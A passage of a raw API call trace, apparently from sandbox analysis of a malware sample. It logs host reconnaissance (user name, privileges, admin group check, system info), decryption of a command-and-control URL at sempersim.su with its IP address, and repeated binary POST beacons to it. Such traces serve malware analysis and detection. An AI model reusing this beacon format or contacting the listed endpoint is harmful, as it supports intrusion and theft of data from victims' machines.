nSize=0x19fed0) returned 1 [0069.671] GetProcessHeap () returned 0x620000 [0069.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6424a8 | out: hHeap=0x620000) returned 1 [0069.671] GetCurrentThread () returned 0xfffffffe [0069.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.672] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x0) returned 0 [0069.672] GetLastError () returned 0x3f0 [0069.673] GetCurrentProcess () returned 0xffffffff [0069.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.674] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x254) returned 1 [0069.674] GetProcessHeap () returned 0x620000 [0069.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6424a8 [0069.674] GetProcessHeap () returned 0x620000 [0069.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6427b8 [0069.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.676] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fecc | out: TokenInformation=0x0, ReturnLength=0x19fecc) returned 0 [0069.676] GetProcessHeap () returned 0x620000 [0069.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0069.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.677] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x639038, TokenInformationLength=0x24, ReturnLength=0x19fecc | out: TokenInformation=0x639038, ReturnLength=0x19fecc) returned 1 [0069.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.678] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x639040*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6424a8, cchName=0x19febc, ReferencedDomainName=0x6427b8, cchReferencedDomainName=0x19fec0, peUse=0x19feb8 | out: Name="RDhJ0CNFevzX", cchName=0x19febc, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fec0, peUse=0x19feb8) returned 1 [0069.681] GetProcessHeap () returned 0x620000 [0069.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x644560 [0069.681] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.682] wvsprintfW (in: param_1=0x644560, param_2="%s", arglist=0x19fea8 | out: param_1="XC64ZB") returned 6 [0069.682] GetProcessHeap () returned 0x620000 [0069.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb80 [0069.682] GetProcessHeap () returned 0x620000 [0069.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.683] GetProcessHeap () returned 0x620000 [0069.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0069.683] CloseHandle (hObject=0x254) returned 1 [0069.683] GetProcessHeap () returned 0x620000 [0069.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6427b8 | out: hHeap=0x620000) returned 1 [0069.683] GetProcessHeap () returned 0x620000 [0069.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6424a8 | out: hHeap=0x620000) returned 1 [0069.683] GetProcessHeap () returned 0x620000 [0069.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb80 | out: hHeap=0x620000) returned 1 [0069.684] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.684] GetDesktopWindow () returned 0x10010 [0069.685] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.686] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fec8 | out: lpRect=0x19fec8) returned 1 [0069.686] GetProcessHeap () returned 0x620000 [0069.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x63b660 [0069.686] GetProcessHeap () returned 0x620000 [0069.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b660 | out: hHeap=0x620000) returned 1 [0069.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.687] GetUserNameW (in: lpBuffer=0x19fcc8, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0069.688] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76dd0000 [0069.689] GetProcAddress (hModule=0x76dd0000, lpProcName="NetUserGetInfo") returned 0x701933a0 [0069.689] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fed4 | out: bufptr=0x6433b0*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x118c89f, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0069.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.695] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fec0, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fec8 | out: pSid=0x19fec8*=0x63ecd0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0069.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.696] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x63ecd0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fecc | out: IsMember=0x19fecc) returned 1 [0069.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.698] GetNativeSystemInfo (in: lpSystemInfo=0x19fea4 | out: lpSystemInfo=0x19fea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0069.698] GetProcessHeap () returned 0x620000 [0069.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0069.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.699] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0069.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.708] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63cc48) returned 1 [0069.715] GetProcessHeap () returned 0x620000 [0069.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0069.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.716] CryptImportKey (in: hProv=0x63cc48, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0069.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.717] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0069.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.718] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0069.718] GetProcessHeap () returned 0x620000 [0069.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0069.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.719] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0069.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.722] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0069.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.723] CryptReleaseContext (hProv=0x63cc48, dwFlags=0x0) returned 1 [0069.723] GetProcessHeap () returned 0x620000 [0069.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6427b8 [0069.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0069.724] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0069.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0069.725] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0069.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0069.726] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0069.726] GetProcessHeap () returned 0x620000 [0069.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0069.726] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x633160*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0069.728] GetProcessHeap () returned 0x620000 [0069.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b690 [0069.728] socket (af=2, type=1, protocol=6) returned 0x264 [0069.728] connect (s=0x264, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0069.798] FreeAddrInfoW (pAddrInfo=0x633160*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0069.798] GetProcessHeap () returned 0x620000 [0069.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63cc48 [0069.798] GetProcessHeap () returned 0x620000 [0069.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0069.799] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.800] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0069.800] GetProcessHeap () returned 0x620000 [0069.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63a7d8 [0069.800] GetProcessHeap () returned 0x620000 [0069.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.801] GetProcessHeap () returned 0x620000 [0069.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0069.801] GetProcessHeap () returned 0x620000 [0069.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0069.802] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.802] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0069.803] GetProcessHeap () returned 0x620000 [0069.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x641e78 [0069.803] GetProcessHeap () returned 0x620000 [0069.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.803] send (s=0x264, buf=0x641e78*, len=237, flags=0) returned 237 [0069.804] send (s=0x264, buf=0x6421e0*, len=159, flags=0) returned 159 [0069.804] GetProcessHeap () returned 0x620000 [0069.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x63b6b0 [0069.804] recv (in: s=0x264, buf=0x63b6b0, len=4048, flags=0 | out: buf=0x63b6b0*) returned 237 [0071.533] GetProcessHeap () returned 0x620000 [0071.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641e78 | out: hHeap=0x620000) returned 1 [0071.534] GetProcessHeap () returned 0x620000 [0071.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0071.534] GetProcessHeap () returned 0x620000 [0071.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a7d8 | out: hHeap=0x620000) returned 1 [0071.534] GetProcessHeap () returned 0x620000 [0071.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cc48 | out: hHeap=0x620000) returned 1 [0071.535] closesocket (s=0x264) returned 0 [0071.536] GetProcessHeap () returned 0x620000 [0071.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b690 | out: hHeap=0x620000) returned 1 [0071.536] GetProcessHeap () returned 0x620000 [0071.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6427b8 | out: hHeap=0x620000) returned 1 [0071.536] GetProcessHeap () returned 0x620000 [0071.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0071.536] GetProcessHeap () returned 0x620000 [0071.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0071.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x63b6b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xcc4) returned 0x264 [0071.539] Sleep (dwMilliseconds=0xea60) [0081.565] GetProcessHeap () returned 0x620000 [0081.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0081.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.572] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0081.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63cc48) returned 1 [0081.601] GetProcessHeap () returned 0x620000 [0081.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0081.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.602] CryptImportKey (in: hProv=0x63cc48, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0081.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.603] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0081.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.604] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0081.604] GetProcessHeap () returned 0x620000 [0081.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0081.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.605] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0081.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.609] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0081.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.610] CryptReleaseContext (hProv=0x63cc48, dwFlags=0x0) returned 1 [0081.610] GetProcessHeap () returned 0x620000 [0081.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6424a8 [0081.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.611] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0081.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.612] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0081.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.617] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0081.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.618] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0081.618] GetProcessHeap () returned 0x620000 [0081.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633160 [0081.633] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0081.634] GetProcessHeap () returned 0x620000 [0081.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633160 | out: hHeap=0x620000) returned 1 [0081.635] GetProcessHeap () returned 0x620000 [0081.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6424a8 | out: hHeap=0x620000) returned 1 [0081.635] GetProcessHeap () returned 0x620000 [0081.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0081.635] GetProcessHeap () returned 0x620000 [0081.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e10 [0081.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.636] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0081.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.641] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63cc48) returned 1 [0081.648] GetProcessHeap () returned 0x620000 [0081.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6392a8 [0081.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.649] CryptImportKey (in: hProv=0x63cc48, pbData=0x6392a8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0081.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.650] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0081.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.651] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0081.651] GetProcessHeap () returned 0x620000 [0081.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6392a8 | out: hHeap=0x620000) returned 1 [0081.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.652] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e10, pdwDataLen=0x19fcfc | out: pbData=0x642e10, pdwDataLen=0x19fcfc) returned 1 [0081.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.653] CryptDestroyKey (hKey=0x62d710) returned 1 [0081.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0081.653] CryptReleaseContext (hProv=0x63cc48, dwFlags=0x0) returned 1 [0081.653] GetProcessHeap () returned 0x620000 [0081.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6427b8 [0081.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.654] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0081.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.655] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0081.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0081.656] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0081.656] GetProcessHeap () returned 0x620000 [0081.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633200 [0081.656] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x633228*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0081.667] GetProcessHeap () returned 0x620000 [0081.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5f0 [0081.668] socket (af=2, type=1, protocol=6) returned 0x254 [0081.668] connect (s=0x254, name=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0081.736] FreeAddrInfoW (pAddrInfo=0x633228*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebc8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0081.750] GetProcessHeap () returned 0x620000 [0081.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x641e78 [0081.757] GetProcessHeap () returned 0x620000 [0081.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0081.758] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0081.759] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0081.759] GetProcessHeap () returned 0x620000 [0081.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x641f00 [0081.759] GetProcessHeap () returned 0x620000 [0081.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0081.760] GetProcessHeap () returned 0x620000 [0081.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642f30 [0081.760] GetProcessHeap () returned 0x620000 [0081.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0081.760] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0081.761] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0081.761] GetProcessHeap () returned 0x620000 [0081.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x6424a8 [0081.761] GetProcessHeap () returned 0x620000 [0081.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0081.762] send (s=0x254, buf=0x6424a8*, len=237, flags=0) returned 237 [0081.763] send (s=0x254, buf=0x6421e0*, len=159, flags=0) returned 159 [0081.763] GetProcessHeap () returned 0x620000 [0081.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x63b6b0 [0081.763] recv (in: s=0x254, buf=0x63b6b0, len=4048, flags=0 | out: buf=0x63b6b0*) returned 237 [0083.605] GetProcessHeap () returned 0x620000 [0083.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6424a8 | out: hHeap=0x620000) returned 1 [0083.606] GetProcessHeap () returned 0x620000 [0083.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0083.606] GetProcessHeap () returned 0x620000 [0083.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641f00 | out: hHeap=0x620000) returned 1 [0083.606] GetProcessHeap () returned 0x620000 [0083.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641e78 | out: hHeap=0x620000) returned 1 [0083.607] closesocket (s=0x254) returned 0 [0083.608] GetProcessHeap () returned 0x620000 [0083.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5f0 | out: hHeap=0x620000) returned 1 [0083.608] GetProcessHeap () returned 0x620000 [0083.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6427b8 | out: hHeap=0x620000) returned 1 [0083.608] GetProcessHeap () returned 0x620000 [0083.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e10 | out: hHeap=0x620000) returned 1 [0083.609] GetProcessHeap () returned 0x620000 [0083.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633200 | out: hHeap=0x620000) returned 1 [0083.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, 